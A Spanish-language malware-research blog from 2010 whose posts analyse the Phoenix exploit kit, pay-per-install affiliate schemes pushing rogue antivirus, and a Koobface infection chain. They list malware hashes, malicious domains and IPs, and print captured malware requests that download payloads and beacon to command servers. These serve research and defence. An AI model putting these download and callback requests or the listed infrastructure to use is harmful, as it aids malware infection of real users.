MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

18.8.10

Estado del arte en Phoenix Exploit's Kit

Las alternativas delictivas crecen muy rápidamente dentro de un ecosistema donde día a día se gestan oportunidades de negocios por intermedio de procesos fraudulentos. En este sentido, la demanda de recursos delictivos para los ciberdelincuentes no se hace esperar y crece constantemente.

Generalmente aparecen nuevos crimeware que buscan obtener un lugar y buena aceptación en las calles virtuales del mundo underground, intentando reflejar un equilibrio en torno al costo/beneficio del "producto" promocionado, que les permita a los delincuentes insertarse en el mercado lo más rápida posible.

Del mismo modo, crimeware ya aceptado en el circuito y muy conocido se actualizan buscando optimizar su “calidad de servicio”. Phoenix Exploit’s Kit, a pesar de su estado minimalista frente a otros de su estilo, es uno de los crimeware con más actividad maliciosa en la actualidad.

El presente artículo expone una serie de datos respecto a las actividades delictivas y fraudulentas llevadas a cabo empleando Phoenix Exploit’s Kit como canal de gestión, cómo es habitualmente el ciclo de negocio delictivo en torno a este crimeware y cuáles son los exploits presentes en sus diferentes versiones.

Phoenix Exploit’s Kit v2.3r
Phoenix Exploit’s Kit v2.3
Phoenix Exploit’s Kit v2.21
Phoenix Exploit’s Kit v2.2
Phoenix Exploit’s Kit v2.1
Phoenix Exploit’s Kit v2.0
Phoenix Exploit’s Kit v1.4
Phoenix Exploit’s Kit v1.31
Phoenix Exploit’s Kit v1.3
Phoenix Exploit’s Kit v1.2
Phoenix Exploit’s Kit v1.1
Phoenix Exploit’s Kit v1.0
Phoenix Exploit’s Kit v1.0beta

Versión en español | Versión en inglés

Otros artículos de MalwareIntelligence

Ver más

2 comentarios

16.8.10

Pirated Edition. Programa de afiliados Pay-per-Install

Los programas de afiliados constituyen un modelo de negocio cada vez más redituable para los delincuentes, además de crear un completo circuito de propagación/infección de malware entre muchas otras alternativas, incentivando a sus clientes con un porcentaje de dinero que obtienen en función del éxito en su propio negocio.

Uno de los sistemas con mayor captación en este modelo de negocio lo constituye el pago por instalación, Pay-per-Install, donde cada cliente obtiene el dinero por la instalación de un malware. Es decir, solamente por propagar malware y esperar que alguien se infecte.

Bajo este circuito, cada afiliado puede ser tanto una sola persona como una botnet, ya que evidentemente el rédito económico que generan los delincuentes diseminando el malware proporcionado por el sistema de afiliados se masifica, y el botmaster se beneficia con una diferencia económica más amplia dentro de un lapso de tiempo más corto, además de las otras vetas económicamente fraudulentas que se generan a través de botnets.

Otro de estos programas de afiliados es Pirated Edition, cuya panel de acceso podemos observar en la siguiente imagen.


Mirando dentro del sistema de afiliados, nos encontramos con un modelo extremadamente minimalista que sólo le permite al delincuente-cliente chequear la cantidad de dinero ganado y descargar el malware a propagar, incluyendo las actualizaciones de este.


Este código malicioso, cuyo nombre por defecto es limew.exe (757eda0929b94ea104a1a80825dee3e2) posee una tasa de detección muy baja. Según el reporte de VT, sólo es detectado por 8 de los 41 motores AV.

Cuando se ejecuta, se reporta al verdadero programa de afiliados que se esconde detrás de este circuito delictivo que, en este caso, responde a husseta.com.


/get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D456E757923271416411A111410015D404E1618156A1971090A03700302010C090B7D7D0C07790305727474047E060C7072786A2F27212634206E6563677130303E666C6E3866505404004204020A55584C041F1B0B1D4D442D42522A021413444A4B4C494E4CB3B5B7B0A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC892808394D7D1D9D7CE85898A8B8C8D8E8FF1E7A1ADA0A9FBAAA9A5BDAABEA8E3BDB5A2B7B2B7BDF8BBB7BABBB7B8B2B3BE898FC48A80849282D5D8D8D3DDDAD6DDC8C7C6D5B1BAA4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 011607da0826.husseta.com
Cache-Control: no-cache

Sin embargo, esta es sólo una de las caras que presenta la estrategia ya que en la misma IP (95.211.98.246) se resuelven otros dominios que cada uno de ellos lleva el mismo template.


010407da082d.deanard.com
082707d91010.bauhath.com
100407da083b.leyeshv.com
110407da0837.giselin.com
110507da031e.bauhath.com
111607da0732.giselin.com
131907da0726.deanard.com
142007da0712.weirden.com
142107da071c.giselin.com
151707da052e.antiona.com
160607d9110b.bauhath.com
161607da0722.leyeshv.com
162507da0612.mccorbet.com
171907da062d.bourgum.com
172307da072e.koralda.com
180507da0308.bauhath.com
181607da031b.derchy.com
182707da0130.bauhath.com
192507da071b.dativism.com
210907da020b.bauhath.com
222707d9101f.bourgum.com
222807d9092a.apomenbe.com

Vale aclarar un detalle particular de las políticas de este programa de afiliados. Para obtener el pago por cada instalación del malware, este debe infectar equipos que se encuentren en los siguientes países: Australia, Belgium, Brazil, Canada, Czech Republic, Denmark, Estonia, France, Germany, Greece, Finland, Hungary, Italy, Ireland, Kuwait, Lithuania, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Russia, Saudi Arabia, Singapore, Slovakia, Spain, Sweden, Switzerland, Turkey, Ukraine, United Arab Emirates, United Kingdom, United States and Japan. Y como sistema de pago se utilizan los servicios de Epassporte, AlertPay, PayPal y Webmoney.

Información relacionada
Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI

Ver más

0 comentarios

11.8.10

Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI

Uno de los negocios más redituables en el ámbito informático delictivo, lo constituyen los programas de afiliados. Estos son sistemas a los cuales los delincuentes se adhieren para obtener un rédito económico en concepto de comisión, como en este caso, por cada instalación exitosa que se realice del malware distribuido a través del sistema.

VIVA INSTALLS, perteneciente al mismo grupo delictivo que se encuentra frente a HAPPY INSTALLS, es uno de ellos. Este sistema se encuentra "protegido" bajo el AS6851 de BKCNET "SIA" IZZI (ATECH-SAGADE), en la dirección IP 91.188.59.51, que resuelve el dominio happyinstalls.com. Este AS es conocido por su alta incidencia en materia de actividades fraudulenta, y porque es empleado también para la propagación de Koobface.


El sistema de afiliados en cuestión promociona uno de los códigos maliciosos del tipo rogue más conocidos: A-fast Antivirus.

El falso antivirus genera varias vetas de negocio, independientemente de la cantidad de instalaciones exitosas. Por un lado, el costo de este rogue es de USD 69.65, con lo cual todos aquellos desprevenidos que "compren el malware", estarán alimentando ese negocio.

Al mismo tiempo, para la compra se debe completar un formulario, en el cual se debe especificar la información de la tarjeta de crédito, lo que proporciona al delincuente más datos para realizar actividades fraudulentas. Sin describir en detalle que la información de la tarjeta de crédito va a completar los campos de alguna base de datos, que luego también se comercializa.

¿Como se realiza el circuito de infección?
El sistema de afiliados facilita a sus "clientes" la URL desde la cual se descarga el malware, advirtiendo que no se verifique la integridad del ejecutable a través de servicios públicos, virustotal por ejemplo. En este caso se trata de los archivos setup.exe y exe.exe (971eab628a7aac18bb29cba8849dff61), el downloader que oficia de vínculo para la descarga de A-fast Antivirus.

Si bien el sistema de afiliados se encuentra en 91.188.59.51, la descarga del rogue se realiza desde 91.188.59.112, dominio a-fast.com. Esta maniobra, si bien es común, demuestra que BKCNET "SIA" IZZI es la sede de un importante volumen de actividades delictivas.


¿Cómo es el proceso de registración?
Acceder particularmente al circuito de los afiliados de negocio implica contar con los requisitos necesarios. Fundamentalmente, un código de activación que es emitido por el sistema de afiliados en función de la recomendación de algún otro afiliado de "confianza"; es decir, un delincuente que ya se encuentre de forma activa en el circuito y que cargue con un periodo de actividades reconocidas.

¿Cuánto gana el afiliado por cada instalación exitosa?
Un tema de interés en torno a los sistemas de afiliados es ¿cuánto se paga, en este caso, por instalación?

Si bien los sistemas de afiliados comparten el mismo modelo de negocio, el costo que pagan por instalación no es el mismo para cada uno de ellos. En el caso de VIVA INSTALLS/HAPPY INSTALLS, los precios son los siguientes:

  • 0,30 dólares por instalación en EE.UU.
  • 0,20 dólares por instalación en Canadá, Australia e Inglaterra.
  • 0,01 dólar por instalación en otros países.
En definitiva, VIVA INSTALLS/HAPPY INSTALLS se dedica solo, por el momento, a la promoción y distribución de solo uno de los tantos (cientos) rogue que forman parte del circuito delictivo.

Ver más

0 comentarios

9.8.10

Campaña de infección a través de Phoenix Exploit’s Pack

Phoenix Exploit’s Pack (PEK) es otro de los programas crimeware con mayor aceptación dentro del ecosistema delictivo en Internet, cuya utilización en las últimas semanas se masificó propagando una importante cantidad de malware.
Los binarios ejecutables que forman parte de la campaña que hasta el momento se encuentra activa, se propagan bajo el nombre por defecto del ejecutable que incorpora el paquete, llamado exe.exe. Algunos de los ejecutables que forman parte de esta campaña son:

8515e378f836afbaf30e29bdf7eed799 - No detectado
bb04fe6f6232dcc0661435ae9a6da513 - Zbot/Krap
82caf746a0d4e32ad633c075f22c1969 - FakeAV
8c30bae5db5d6e693bd3d343176d10d4 - GootKit
80592a5c5c7f4e91e1fc7d45c69b26df - Zbot
f36dd53834bcd0997dbbf50f54617941 - Probablemente una variante de Vundo
f4d4734d4f7392290a341a367e412226 - FakeAV
310226a86e883284eb3e821895156c4e - Katusha
971eab628a7aac18bb29cba8849dff61 - Probablemente una variante de Genome
0c1de65a594796b77030892498da1372 - Small/Agent
10b21cd819089f8d0a3788107c1125f4 - Olmarik/TDSS
687992266d21c6d6ad3232d6c98e2819 - Papras
51b834a745afd2787848f59ee30df659 – Zbot

La actualización de los binarios que se propagan a través de este crimeware es muy dinámica. Además, cuenta con un amplio repertorio de exploits precompilados para explotar las ya clásicas vulnerabilidades en navegadores y programas lectores de PDF.

all.pdf (75c38165c54f99bc3631544855206aad) CVE-2009-0927
allv7.pdf (be3d6d64687cc83825476947e2955591)
collab.pdf (69fef7cb57f8c16128ec9daba51e53ae) CVE-2007-5659
geticon.pdf (149335ac9d8b1e9918411c4c71cdf8bf) CVE-2009-0927
flash.swf (3310c3eb2b43f1353166a7cd21566e34)
ie.html (715d1fc6c63fc350cad997083e2ddfbb) CVE-2006-0003
libtiff.pdf (e0b17cc54294f26b9b9df77770dc5380) 
newplayer.pdf (13da5c68a1eb5a895c1bd3da8740ee75)
printf.pdf (c62c08cc2ed57c187d5fd0eda12e1443) CVE-2008-2992
vistaie7.html (ffcb420c6a9c4c91c130fdf171424299)
vistan7ie8.html (74aae64e8c583623d3592a2f7061c64d)
vistan7other.html (640c67a372889068a426aebaf21f18b9)
xpie7.html (0e8488bc4f4936fceb4907a141b91567)
xpie8.html (c8bba1b71d570917551d8c96486ff5e6)
xpother.html (242988c80807f9bdb2631a7a9c65c941)

Entre los dominios utilizados durante Julio de 2010 para la campaña, se encuentran:

1.fxguard.co.cc
1.tmjack.co.cc
1247892628.zage.in
2.keyzan.in
32874239049394.com
33askday7w2.com
appstoredemon.com
autoaccoustics.ru
avadrom.co.in
barabudd444.com
barabudd555.com
baragas-budd3.com
bardj96.info
bequeathooh4.info
beretjhvb5.info
bestrachel.com
bootch.in
bstservice.biz
ca200dajskjdhd.com
carauter.com
cheryy.com
cinbonto.com
condonikzang.info
congealagmfd6dbd.info
contritefg6.info
conundrumwth.info
dandbcorporation.com
debiller.com
dogmun.com
domsre.com
durposty.com
effacedfge8.info
effusive24ghj.info
elvagony.com
encelih.biz
eurpoker.org
fedou-kast.com
fffvideo.info
fist0.info
fortuna1.info
fortunaclasse.com
gepare.com
googlemugl.com
guglctat.net
gygack.com
heging.com
highclips.ru
iktagirl.com
illinate.be
illinated.co.in
in.xtborder.co.cc
intercullertdi50.net
irrationalsdv3.info
jenaallee.com
jk100asdsadhg.com
judiciousr347.info
justanothersillydomain.org
kaksosatshop.info
khozywebs.ru
kigll.com
kombry.com
lampstage.in
larseny.com
lartoil.com
lcitsih.biz
liveenline.com
lkem.info
loltrafo.co.cc
magicvideoonline.in
metyre.com
miror-couter-3.in
miror-couter-4.in
miror-couter-6.in
mixoto.co.in
mjef.info
monovideo.ru
musicmastersite.in
mytlo.com
navigable446.info
nextso.net
nimtsih.biz
paypay.co
perspicacitydg3.info
prosoftdesign.in
ratifytur6.info
regaledgh7.info
seawizard.net
servat-cooper.com
sexandvideo.ru
spl.ipomats.in
sunn.in
taciturnsdg5.info
tamesteel.net
toppulse32.org
utanmay.co.cc
utry.in
vbmn.info
vdsconfig.in
volgo-marun.cn
wanefbdf3.info
yadr3.com
zealotbbd6.info
zomotuir.com
zoor.in
zsitsih.biz

Información relacionada
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y (...) malware
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware...
Los precios del crimeware ruso. Parte 2
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Ver más

0 comentarios

25.7.10

Circuito de Koobface desde 91.188.59.10 (BKCNET "SIA" IZZI)

Luego de varios meses sin tener novedades de Koobface, por lo menos sobre su propagación típica empleando como cobertura de ataque la clásica pantalla falsa de YouTube, vuelve con otra campaña de propagación.

En esta oportunidad, su diseminación sigue siendo a través de ingeniería social visual pero no bajo el template del supuesto video de YouTube sino que utiliza una página con contenido pornográfico.


Como se aprecia en la captura, cuando se intenta acceder a alguno de los supuestos videos, una pequeña ventana advierte sobre la necesidad de la descarga de un codec. Al aceptar, se descarga Koobface bajo la cobertura de un binario llamado codec.exe (5910e59d592781cec3234abf57f8d000), desde la dirección IP 91.188.59.10 que resuelve el dominio 1zabslwvn538n4i5tcjl.com. Esta IP es utilizada para la propagación de Koobface desde marzo de 2010.

Además, la página contiene embebido un script que redirecciona el tráfico hacia la descarga de un archivo PDF que contiene un exploit para CVE-2008-2992.


También en la misma IP pero que deja en evidencia que su gestión se esta realizando a través de un conocido crimeware: YES Exploit System.


El binario ejecutable codec.exe se encuentra empaquetado con UPX (UPX 0.89.6 - 1.02 / 1.05 - 1.22 -> Markus & Lazlo). Cuando se activa genera un BAT (se autoelimina) con instrucciones al C&C, estableciendo conexión contra 1zabslwvn538n4i5tcjl.com desde donde descarga los siguientes códigos maliciosos:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

El BAT contiene la siguiente instrucción de conexión y envió de información al C&C:

http://urodinam.net/33t.php?stime=1280078675

Este dominio se encuentra en la misma dirección IP 91.188.59.10 con instrucciones para la descarga de otro malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

Se trata de una copia del rogue Security essentials 2010. Se conecta a getexepizdec.com (91.188.59.211) desde donde descarga el archivo firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) y getmsdfgee54.com (88.80.4.19) desde donde descarga exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) con una muy baja tasa detección.

Resumiendo, el circuito que recorre koobface desde BKCNET "SIA" IZZI involucra diferentes piezas del ámbito delictivo que se encuentran interrelacionadas entre si con el mismo objetivo: $$$$$ (retroalimentar la economía clandestina); dejando a su paso un verdadero portfolio de malware.

Bajo 91.188.59.10 es gestionado por un conocido crimeware cuyo costo en el mercado underground ronda los $1000 y al ser ejecutado se encarga de apuntar la descarga de otros códigos maliciosos a la computadora victima, gestionados bajo la coordinación de afiliados de negocio que incrementan sus ganancias por cada instalación exitosa del rogue.

Información relacionada
Simbiosis del malware actual. Koobface
Campaña de propagación de Koobface a través de Blogspot
YES Exploit System como Crimeware-as-a-Service
YES Exploit System. Otro crimeware made in Rusia

Ver más

1 comentarios

Suscribirse a: Entradas (Atom)